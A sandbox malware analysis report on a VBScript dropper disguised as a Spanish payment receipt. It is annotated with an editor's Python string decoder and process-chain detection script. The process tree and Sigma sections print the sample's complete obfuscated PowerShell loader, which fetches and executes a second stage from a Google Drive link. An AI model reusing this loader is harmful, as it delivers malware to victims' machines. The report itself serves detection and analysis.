
Windows Analysis Report
JUSTIFICANTE DE PAGO.vbs

Overview

General Information

Sample name:JUSTIFICANTE DE PAGO.vbs
Analysis ID:1430767
MD5:fdf5dceb2d284e54cf0a421a463b621d
SHA1:e5f7ec649576934ac61090f1380d23b9d2ac5d09
SHA256:0923a2d6d1c333ebd0f4320b2fe23015ecf70f3ebeb5a89d883b8259869d4743
Tags:vbs

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7332 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7420 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Karyokinesis104 = 1;$Unrefracting='Substrin';$Unrefracting+='g';Function Agonothet($Haandgribelige){$Judiciousness=$Haandgribelige.Length-$Karyokinesis104;For($organoleptically=5; $organoleptically -lt $Judiciousness; $organoleptically+=(6)){$Bundlses+=$Haandgribelige.$Unrefracting.Invoke($organoleptically, $Karyokinesis104);}$Bundlses;}function popess($Rdstjerternes){& ($Speecher) ($Rdstjerternes);}$Stentrykkerierne=Agonothet 'SuspiMStaccoUnvigzOverli ,ntolQuainl degeaPaste/Arabi5Strat.In.er0V,cci Petit(mo,igW Und,iD armn C brdRadiooStraawPharys.yldi tilstNAfhjeTCanad Skov1S,edi0 Min..H nds0 Pant;Svend Ne.paWbivaliPaveknPosts6Se,ip4Poro.;Plebi ConatxHuele6 Gras4Servi;Sonny ,ivvarGeckovShipp: Dans1 ulmu2runen1 Pro .br.sn0 Fina)Se vt Unde GForsteDesincHansgkBelonoForh./Epose2atmoc0nedve1Float0Missi0Vigne1Harce0 Gang1Pte o .egynFEndl iKonverPanereKruspf X.loo DistxAbdu./Klass1 Fr.m2Chink1Auten.L.del0Rulle ';$Untestable27=Agonothet ' PolyUTarogs,onheeJobs r,okse-Ted iA OlymgUnhaneSagitnMattetDanse ';$Mblements=Agonothet 'BefryhUn ertGr.fit TagspPul,os.jtad:Macro/T,edo/ Na.udBascurShippiChangvAuxineBegrn. 
A isgprimeoLovbeo T rng StralGoogoeD fer.EvighcSusp,oFr semDeg,a/AgftauLea hcTppeb?.asimeFlavoxTautop Tremo Natur,irketAgerk=Piet.dVindioSpisewDespinPaakllFishsoEl,esaMo.aidHiela&outgli .lgedRusti=Seign1 udstp Quen8 OverCafblaAKa hi5i.terIShawiWSkovrVAfparRS.icigIntragArrhigRtenjeDemarGLeptoBJo,glHbolst5 S.rjJTillgtGens.5 TermSParosAOvern7Tingeb .kstzStilpDDk,eniAscesw fo.wAColu.7 LazaDFemgreWaggo ';$Gashes=Agonothet 'Vekse> Tlle ';$Speecher=Agonothet 'Gl.cyiTr.nseEkspoxS,ibs ';$Hjemgivelsen='Drfyldingen';popess (Agonothet 'Sam.uSRetateO,pebtDucti-KangaC Li soGrundnEnsomtOzon.eStratnIleitt Dank p.ri-BesaaP Kan.aPrefat Alfah Tora KismTDrmm.:Halm \ UlleC Ghosl Whalu Le.nsDomnetRewineAccesr,necdyLands.fejlutNonauxCamayt.unkt Ubud -BinapVOvermaAkti.l billuUnparePr.in Rubri$JackaHInaprjJer.beAstr,mScenag RolliBand.vRecule AnnalZani.sKobbeeKont,n,ncom; Nonw ');popess (Agonothet 'BrugeiBassefarbej Tour(RestptG auceAnt ssSwerdtRela.-gondopTailgaKontotUsitah Hnge BifokTAksle:Fanci\KnickCFodtulRevoluOr.ogs Af.ot,npreeYngstrV venyBitte.RovdytSalamxOmnortBores)Behan{ Ek.eeChillxTele,i .trut Unl,} Slu ;L,vsf ');$Julegavens = Agonothet ' Bek eSheracUnwirhvr.stoBehnd Unmuz%anke,aOrigepBagr.p .ndhdGy,noaPer itPerspaKomed% fixu\TocorTB,boer ForhaHaroln BrungHan,lsGyptet,arkfiMictul PseufMilielVapordManteeMessi. LophPCerbeeTabacrSam.m Sigh,& F.br&Socio len.ie,oritcJagtsh.oraloInfan Sala$Nigri ';popess (Agonothet 'M,lkm$StatsgErhvel CrunoSpickbWheezaIchull H rd:SolioC,estuo ExosnPromisDonnatGenbra Tsa,n ejfntPlateiRandba shas Unh,=Indig(Skdebc RancmFrontdGenma .irc/ DeklcPres. 
Negle$ElverJHavaruForsrl,mbereR.eumginva,aZendovSpi.ieratepnHelfls F rt)G ucu ');popess (Agonothet 'ju,ef$Dob,egAnt.gl SiesoinddabThalaaOmforlMica.:DrageSVand.lNaturiHer enMontetDesmoesalatrTofro4Bo dg8u,sea=Vic.u$Ge erMUnciabDrvtylDon ee PutnmGlyc ePlat nskovttamalgsopvel.rabb.sAnacep Bltel .ouni.loritSpand(Nstfo$FiskeGBard,aPajamsTuetuhAl,ereCiselsHyp r)Immun ');$Mblements=$Slinter48[0];popess (Agonothet ' seam$Hel.cgArbejlPolygoStadfb Bulea mil ludska: St tREro,ru MatrbGrailrPiot,iExtercHalimeBy.gersti.ueCompasDeafe1Ethan0Almsd7Linea= Ud,tNMineseUd,ikwDeute-K.ystOMarkibEks mjMillieMondncUndelt.rapp BivirSSkizoymuntrs GingtPi.seeDampemArta,.Z nneNSovekeKatystBehag.LimbeWDecaseBillyb obulC.rilal PalaiPjecee,oresnMelletPenna ');popess (Agonothet 'Over.$ YounR RaceuS.ralb lectrFamiliMask.cDi feeHu rarNondeeAxhamsg,bbe1 reol0 Snub7Kri.e.Afr,dHBand.eAktivaMyotod Afkae c tarHegnssValgk[Fa le$Ere.tUEasygn billthasteeOmdebsPalertVisu a ZonkbDockilRo.eseStr,a2Hjeml7 Hjlp]Mi.la=Godsv$MicroSSte.st NudleBestrnHercutNons,r Ba.oyIm.otkGarruk FolkeMaillrIndreiSynale outdrCykeln un eeSuper ');$celandines=Agonothet 'Nbfl.RRa.bruTrst,bOtorrrYpperi,abatcFlommenamnarBranceScreesLindy1.edev0Un.er7Bolon. 
Eta.D Co loChariwTaarnnSoleml ScanoEks ea TreddS.ambF rudeimo,talKadeneMesat(,earf$GaardMBrystbClumplN,biaeGatt mLrepleFittinP,eintCordesUns,o,wi.es$ KompIProt,sBllebdP rickAfs ukPinnieRetab4Efter7 Dec,)Peace ';$celandines=$Constantias[1]+$celandines;$Isdkke47=$Constantias[0];popess (Agonothet 'Konvo$D sksg .arml ChamoSpdb bForekaOver lDipht:Cit,zhSuffeyForkrdListerVoryso ndymcSpageoTeserrAmantaDab,ilSu.ab=Forem(TraveTMalmieDuknasChlortTo,tu-niobePHa,ndaFejlmt Floth Zadr Men,o$GardeI NivesEpis,dTilbjkRembuk Forge cond4 .jib7Ri.ou)Flirt ');while (!$hydrocoral) {popess (Agonothet 'Drags$ La.egFlo hlLandsoVelgrbPoloeaPremalProgr:me,akDAfregiGirenfHairnfV.jnieKalkurTrstieAfpilnDi hocSuetsiF.actnLan vgGrf.e=Infor$MorgetFakturT ldfuO.stneyderk ') ;popess $celandines;popess (Agonothet 'ApertS Biomt Fonda ObserAnstrtBu.fo-SearcSSa,tal ExpoeU,skyePneu,pCra l Twib4Scute ');popess (Agonothet 'H lpe$ ForsgTaknelZosteo Brugbsvvefa Ge.mlModst:K.wieh prrsy,umildBravurGenudoFeriecZapuso Strur RuskaBloddl Int,=Smaln(LamelTDichoeHa mosQu.nntTin,f-Snup,P,aaseaDisp,tJudash Blan ryg v$Tax eIPiscasKli,kdEcheskNetkokT,aere Canz4 aund7t.ene).ngou ') ;popess (Agonothet 'Disda$ PrergScenalTouchoTra sbD finaSprinlHist :ReproSBiomat Vetco PistwAfbrnwRundtoVeeenoOrthodMythi3Unifo0Kines=Levem$Beva,gDiscelSekito.avfobTe.miarevlelUdben:ReskoSF,ltstR hearNe atgDa,legJurisaraketr UdvinSvarrs .ndesRu.katPlneroRutinf DopifProloeBlomsrAbands.tnkn+Moboc+Apoci%Delta$ EsopS.mitslAlvori UnrenBisamt fvaneu,sacrFarv 4folke8El en.Liberc upero ilduH akpnSteept Anse ') ;$Mblements=$Slinter48[$Stowwood30];}popess (Agonothet 'Tayr $ArmbagQueenlAllezo.mstnbkongsa FremlA.sik:Lege.DLo beo BienmEksameHjulssNden,tTap,oiFennekKohovv,afferEco yeT rjel AndesSilkseSatisr,hilosBaksn Man,a=Sark. 
Vans GNed,ieAfkastgysen-AiramC B.droCapsinAdiabt KompeSprinn.isfutBolig Phary$ O.onIAlkohsPlombdSenteklimpikKongeeSise.4homon7Bel.c ');popess (Agonothet 'Para,$Deemig Fllel sseoMulslb El,eam anelPs,lm:AgituTgang.eKastrn PhenaNo,prkAffi,tMnstraAmbitk Fste In.er=frekv Fisk[LnsomS Stasy,onvisGlaivt SouveGlaismRudsk. TmthCIsopyo Gl.tnUnprov .jlle Entrrdet ctMedit]Dagos:Endag:DecliFPermirStoppo GenemBelgiBJunipaRe.nfsKl.ppeFrtid6Cornc4Sp,roSAfndetTal.trAcrosiG.oedn MetagNarko(Trfor$ PseuDRailloWhi,emKeybde CystsTreattUnem iC pitk Funkv.idgerm.noseprvebl Venns Unsee uro rsvimls H.lt)Helio ');popess (Agonothet 'Bruse$magt gWag ilAvnedopupilbSaltaaBatiklSlukn: Mo,iR Legga Petrt esole s,ndpE.staeArenanAjoursUnderiStango ShronBlokm Sigil=Teend Skils[CheneSSjipnyO togs vernt ruffeBrnepmSluts.Re,ssTTriloeCa,woxPureetArg.n. ChicE Inten.etshcBu,fpoBr.eod PubliAssonnMis.cgstarn]Tuill:Sulp : poseA HennS AposC RsonI.versIK rsu.kommaGWusppeTi.stt HypeSS ifttLepidrHumifi ,otrnEk.prg,amme(Ba,lo$BourtTFalsieGainsnFrav,aG.dfokOp,evt rmpa.ommekDysan)Bygni ');popess (Agonothet 'Alant$FladbgthramlFolkeo Livsb P.roaMe.halFiske:M,lleMShawwePreinnDecenu,njuraProfilTarint Sti el,ehmrPres nKildeaDelbet R.fli BlatvOverie nudirB usksUn.az9.ntra3Janap=Termo$ FileRCh.mpaPrecitBagste CapipHuehueTillgnDrmmes Nedkisph.gohu,tlnDilet.Syda.s Te,suHaa dbTrilos Sinst Syslr jentiVandsnflunkgCo vi( am,e3serig0 Kom,4Stjer6Jeep,8Dueur3Outsp,Steni2Cysti7 Argu6Tetan4Psych8Nitro)Lubri ');popess $Menualternativers93;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7580 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Trangstilflde.Per && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
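Every string in the PowerShell stage above is passed through Agonothet, which returns $s.Substring($i, 1) for $i = 5, 11, 17, ... while $i is below $s.Length - 1; the other five characters of each six-character chunk are filler, and popess then runs the result through & ($Speecher). The decoder below is an added example by the editor, not code from the sample or from Joe Sandbox. It ports that scheme to Python and decodes the three literals from the command line that this page reproduces without loss; the other literals contain positions where non-ASCII characters were stripped during page extraction (visible in names such as Rdstjerternes and Bundlses), so they do not decode cleanly from this copy. The function names agonothet, decode_literals and decode_assignments are the editor's.

```python
"""Decoder for the string obfuscation used by the PowerShell stage in this report.

Added example (editor's code, not the sample's or Joe Sandbox's). The sample's
Agonothet function returns $s.Substring($i, 1) for $i = 5, 11, 17, ... while
$i < $s.Length - 1; everything else in each literal is filler.
"""
import re
from typing import Dict, List

FIRST = 5    # $organoleptically starts at 5
STRIDE = 6   # $organoleptically += 6
WIDTH = 1    # $Karyokinesis104 = 1: Substring length, and the slack cut off the end


def agonothet(blob: str) -> str:
    """Python port of the sample's Agonothet: keep blob[5], blob[11], ... below len-1."""
    return "".join(blob[i:i + WIDTH] for i in range(FIRST, len(blob) - WIDTH, STRIDE))


# Literal arguments to Agonothet, copied verbatim from the command line in the report.
LITERALS = {
    "Speecher": "Gl.cyiTr.nseEkspoxS,ibs ",
    "Untestable27": " PolyUTarogs,onheeJobs r,okse-Ted iA OlymgUnhaneSagitnMattetDanse ",
    "Gashes": "Vekse> Tlle ",
}

# The literals contain no single quotes, so a non-greedy quoted capture is enough.
AGONOTHET_CALL = re.compile(r"Agonothet '([^']*)'")
AGONOTHET_ASSIGN = re.compile(r"\$(\w+)\s*=\s*Agonothet '([^']*)'")


def decode_literals(cmdline: str) -> List[str]:
    """Decode every Agonothet '<literal>' call found in a command line, in order."""
    return [agonothet(blob) for blob in AGONOTHET_CALL.findall(cmdline)]


def decode_assignments(cmdline: str) -> Dict[str, str]:
    """Map $Var = Agonothet '<literal>' assignments to their decoded values."""
    return {name: agonothet(blob) for name, blob in AGONOTHET_ASSIGN.findall(cmdline)}


if __name__ == "__main__":
    for name, blob in LITERALS.items():
        print(f"${name} = {agonothet(blob)!r}")
```

Running the block prints $Speecher = 'iex', $Untestable27 = 'User-Agent' and $Gashes = '>', which is what the rest of the stage needs: popess is an indirect Invoke-Expression, and the User-Agent name is set on the download request shown in the network section. Feed the full command line into decode_assignments once you have a copy that preserves the original characters.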
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 7420 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0x27ba36:$b2: ::FromBase64String(
  • 0x27ba6e:$b2: ::FromBase64String(
  • 0x27baa7:$b2: ::FromBase64String(
  • 0x27bae1:$b2: ::FromBase64String(
  • 0x27bb1c:$b2: ::FromBase64String(
  • 0x27bb58:$b2: ::FromBase64String(
  • 0x27bb95:$b2: ::FromBase64String(
  • 0x27bbd3:$b2: ::FromBase64String(
  • 0x27bc12:$b2: ::FromBase64String(
  • 0x27bc52:$b2: ::FromBase64String(
  • 0x27bc93:$b2: ::FromBase64String(
  • 0x27bcd5:$b2: ::FromBase64String(
  • 0x27bd18:$b2: ::FromBase64String(
  • 0x27bd5c:$b2: ::FromBase64String(
  • 0x27bda1:$b2: ::FromBase64String(
  • 0x27bde7:$b2: ::FromBase64String(
  • 0x27be2e:$b2: ::FromBase64String(
  • 0x27be76:$b2: ::FromBase64String(
  • 0x27bebf:$b2: ::FromBase64String(
  • 0x27bfa3:$b2: ::FromBase64String(
  • 0x27dbcb:$b2: ::FromBase64String(
Source | Rule | Description | Author | Strings
amsi64_7420.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0x10106:$b2: ::FromBase64String(
  • 0xd4a1:$s1: -join
  • 0x6c4d:$s4: +=
  • 0x6d0f:$s4: +=
  • 0xaf36:$s4: +=
  • 0xd053:$s4: +=
  • 0xd33d:$s4: +=
  • 0xd483:$s4: +=
  • 0xf6d4:$s4: +=
  • 0xf754:$s4: +=
  • 0xf81a:$s4: +=
  • 0xf89a:$s4: +=
  • 0xfa70:$s4: +=
  • 0xfaf4:$s4: +=
  • 0xdbbd:$e4: Get-WmiObject
  • 0xddac:$e4: Get-Process
  • 0xde04:$e4: Start-Process

System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs", ProcessId: 7332, ProcessName: wscript.exe
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs", ProcessId: 7332, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Karyokinesis104 = 1;$Unrefracting='Substrin';$Unrefracting+='g';Function Agonothet($Haandgribelige){$Judiciousness=$Haandgribelige.Length-$Karyokinesis104;For($organoleptically=5; $organoleptically -lt $Judiciousness; $organoleptically+=(6)){$Bundlses+=$Haandgribelige.$Unrefracting.Invoke($organoleptically, $Karyokinesis104);}$Bundlses;}function popess($Rdstjerternes){& ($Speecher) ($Rdstjerternes);}$Stentrykkerierne=Agonothet 'SuspiMStaccoUnvigzOverli ,ntolQuainl degeaPaste/Arabi5Strat.In.er0V,cci Petit(mo,igW Und,iD armn C brdRadiooStraawPharys.yldi tilstNAfhjeTCanad Skov1S,edi0 Min..H nds0 Pant;Svend Ne.paWbivaliPaveknPosts6Se,ip4Poro.;Plebi ConatxHuele6 Gras4Servi;Sonny ,ivvarGeckovShipp: Dans1 ulmu2runen1 Pro .br.sn0 Fina)Se vt Unde GForsteDesincHansgkBelonoForh./Epose2atmoc0nedve1Float0Missi0Vigne1Harce0 Gang1Pte o .egynFEndl iKonverPanereKruspf X.loo DistxAbdu./Klass1 Fr.m2Chink1Auten.L.del0Rulle ';$Untestable27=Agonothet ' PolyUTarogs,onheeJobs r,okse-Ted iA OlymgUnhaneSagitnMattetDanse ';$Mblements=Agonothet 'BefryhUn ertGr.fit TagspPul,os.jtad:Macro/T,edo/ Na.udBascurShippiChangvAuxineBegrn. 
A isgprimeoLovbeo T rng StralGoogoeD fer.EvighcSusp,oFr semDeg,a/AgftauLea hcTppeb?.asimeFlavoxTautop Tremo Natur,irketAgerk=Piet.dVindioSpisewDespinPaakllFishsoEl,esaMo.aidHiela&outgli .lgedRusti=Seign1 udstp Quen8 OverCafblaAKa hi5i.terIShawiWSkovrVAfparRS.icigIntragArrhigRtenjeDemarGLeptoBJo,glHbolst5 S.rjJTillgtGens.5 TermSParosAOvern7Tingeb .kstzStilpDDk,eniAscesw fo.wAColu.7 LazaDFemgreWaggo ';$Gashes=Agonothet 'Vekse> Tlle ';$Speecher=Agonothet 'Gl.cyiTr.nseEkspoxS,ibs ';$Hjemgivelsen='Drfyldingen';popess (Agonothet 'Sam.uSRetateO,pebtDucti-KangaC Li soGrundnEnsomtOzon.eStratnIleitt Dank p.ri-BesaaP Kan.aPrefat Alfah Tora KismTDrmm.:Halm \ UlleC Ghosl Whalu Le.nsDomnetRewineAccesr,necdyLands.fejlutNonauxCamayt.unkt Ubud -BinapVOvermaAkti.l billuUnparePr.in Rubri$JackaHInaprjJer.beAstr,mScenag RolliBand.vRecule AnnalZani.sKobbeeKont,n,ncom; Nonw ');popess (Agonothet 'BrugeiBassefarbej Tour(RestptG auceAnt ssSwerdtRela.-gondopTailgaKontotUsitah Hnge BifokTAksle:Fanci\KnickCFodtulRevoluOr.ogs Af.ot,npreeYngstrV venyBitte.RovdytSalamxOmnortBores)Behan{ Ek.eeChillxTele,i .trut Unl,} Slu ;L,vsf ');$Julegavens = Agonothet ' Bek eSheracUnwirhvr.stoBehnd Unmuz%anke,aOrigepBagr.p .ndhdGy,noaPer itPerspaKomed% fixu\TocorTB,boer ForhaHaroln BrungHan,lsGyptet,arkfiMictul PseufMilielVapordManteeMessi. LophPCerbeeTabacrSam.m Sigh,& F.br&Socio len.ie,oritcJagtsh.oraloInfan Sala$Nigri ';popess (Agonothet 'M,lkm$StatsgErhvel CrunoSpickbWheezaIchull H rd:SolioC,estuo ExosnPromisDonnatGenbra Tsa,n ejfntPlateiRandba shas Unh,=Indig(Skdebc RancmFrontdGenma .irc/ DeklcPres. Negle$ElverJHavaruForsrl,mbereR.eumginva,aZendovSpi.ieratepnHelfls F rt)G ucu ');popess (Agonothet 'ju,ef$Dob,egAnt.gl SiesoinddabThalaaOmforlMica.:DrageSVand.lNaturiHer enMontetDesmoesalatrTofro4Bo dg8u,sea=Vic.u$Ge
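The three Sigma matches above key on the same chain the process tree shows: wscript.exe executing a .vbs, wscript.exe spawning powershell.exe, a 7247-character command line, and a cmd.exe child that echoes %appdata%. The script below is an added example by the editor, not Sigma or Joe Sandbox code. It encodes those checks as plain Python and runs them over hand-written process-creation records that mirror the tree: the field names follow Sysmon event 1 (Image, ParentImage, CommandLine), the parent of wscript.exe is assumed to be explorer.exe because the report leaves ParentImage empty, the long command line is the head of the real one padded with filler to the reported length, and the PID 9001 record is a benign control the editor added. Thresholds and rule names are the editor's.

```python
"""Process-chain triage for the wscript -> powershell -> cmd pattern in this report.

Added example (editor's code, not Sigma's or Joe Sandbox's). The events are
constructed to mirror the report's process tree; they are not captured telemetry.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcessEvent:
    """Subset of Sysmon Event ID 1 fields needed for the checks."""
    pid: int
    image: str
    parent_image: str
    command_line: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SHELLS = POWERSHELL | {"cmd.exe"}
LONG_CMDLINE = 4096  # characters; editor's threshold, the report measured 7247
SCRIPT_FILE = re.compile(r'\.(?:vbs|vbe|js|jse|wsf)"?\s*$', re.IGNORECASE)
# Method-group invocation, "& ($var)" indirect call, or a bare iex.
DYNAMIC_INVOKE = re.compile(r"\.Invoke\(|&\s*\(\$\w+\)|\biex\b", re.IGNORECASE)
# cmd.exe used only to expand %appdata%, as the tree's PID 7580 does.
ENV_PATH_ECHO = re.compile(r'/c\s+"?echo\s+%appdata%', re.IGNORECASE)


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


def findings(ev: ProcessEvent) -> List[str]:
    """Return the names of every check the event trips, in a fixed order."""
    img, parent = _name(ev.image), _name(ev.parent_image)
    cl = ev.command_line
    hits = []
    if img in SCRIPT_HOSTS and SCRIPT_FILE.search(cl):
        hits.append("script_file_via_wscript")
    if parent in SCRIPT_HOSTS and img in SHELLS:
        hits.append("script_host_spawns_shell")
    if len(cl) >= LONG_CMDLINE:
        hits.append("very_long_command_line")
    if img in POWERSHELL and DYNAMIC_INVOKE.search(cl):
        hits.append("dynamic_invocation")
    if img == "cmd.exe" and parent in POWERSHELL and ENV_PATH_ECHO.search(cl):
        hits.append("appdata_path_resolution_via_cmd")
    return hits


def triage(events) -> Dict[int, List[str]]:
    """Map each PID that trips at least one check to its findings."""
    out = {}
    for ev in events:
        hits = findings(ev)
        if hits:
            out[ev.pid] = hits
    return out


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Head of the real command line from the tree; padded below with filler so the
# record reaches the 7247 characters the report measured (constructed).
PS_HEAD = (
    '"' + PS + '" "$Karyokinesis104 = 1;$Unrefracting=\'Substrin\';'
    "$Unrefracting+='g';function popess($Rdstjerternes){& ($Speecher) ($Rdstjerternes);}"
)
SAMPLE_EVENTS = [
    ProcessEvent(7332, r"C:\Windows\System32\wscript.exe",
                 r"C:\Windows\explorer.exe",  # assumed; the report leaves ParentImage empty
                 r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs"'),
    ProcessEvent(7420, PS, r"C:\Windows\System32\wscript.exe",
                 PS_HEAD + "A" * (7247 - len(PS_HEAD))),
    ProcessEvent(7428, r"C:\Windows\System32\conhost.exe", PS,
                 r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcessEvent(7580, r"C:\Windows\System32\cmd.exe", PS,
                 r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Trangstilflde.Per && echo $"'),
    # Benign control (constructed): interactive PowerShell from Explorer, short command.
    ProcessEvent(9001, PS, r"C:\Windows\explorer.exe",
                 'powershell.exe -NoProfile -Command "Get-Date"'),
]

if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS).items():
        print(pid, ", ".join(hits))
```

The conhost.exe child and the benign control produce no findings; PID 7420 trips three checks at once, which is the combination worth alerting on, since any one of them (a long command line in particular) fires on legitimate administration scripts as well.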
No Snort rule has matched


AV Detection

Source: http://pesterbdd.com/images/Pester.png; URL Reputation: Label: malware
Source: JUSTIFICANTE DE PAGO.vbs; VirusTotal detection: 9% (permalink)
Note on the URL-reputation hit: http://pesterbdd.com/images/Pester.png is the IconUri in the manifest of the Pester module that ships with Windows PowerShell, and it was found in the same powershell.exe memory region as the module's https://github.com/Pester/Pester project URL and Apache-2.0 license URL. It is loaded-module residue, not a URL this sample requests, and should not be used as an indicator for this sample.
Source: unknown; HTTPS traffic detected: 142.250.101.138:443 -> 192.168.2.10:49705 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.10:49706 version: TLS 1.2
Source: Binary string: e.pdb source: powershell.exe, 00000002.00000002.1376694378.000001D95C843000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Target.pdb source: powershell.exe, 00000002.00000002.1346871388.000001D942A24000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbfYYo source: powershell.exe, 00000002.00000002.1393917309.000001D95C925000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1376694378.000001D95C8A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.1376694378.000001D95C87F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb_4 source: powershell.exe, 00000002.00000002.1394575729.000001D95CB20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: t.Automation.pdb source: powershell.exe, 00000002.00000002.1346871388.000001D9429C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1394575729.000001D95CB20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32/ source: powershell.exe, 00000002.00000002.1394575729.000001D95CB8D000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe; Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e (this is the TLS 1.2 client hello of the Windows 10 Schannel stack, which PowerShell's web cmdlets use, so the hash identifies the OS TLS library rather than this family; on its own it is weak evidence)
Source: global traffic; HTTP traffic detected: GET /uc?export=download&id=1p8CA5IWVRgggeGBH5Jt5SA7bzDiwA7De HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.google.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /download?id=1p8CA5IWVRgggeGBH5Jt5SA7bzDiwA7De&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.usercontent.google.com | Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; DNS traffic detected: queries for: drive.google.com
Source: powershell.exe, 00000002.00000002.1347362979.000001D9466E6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.1347362979.000001D94671F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.1370143781.000001D9546A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
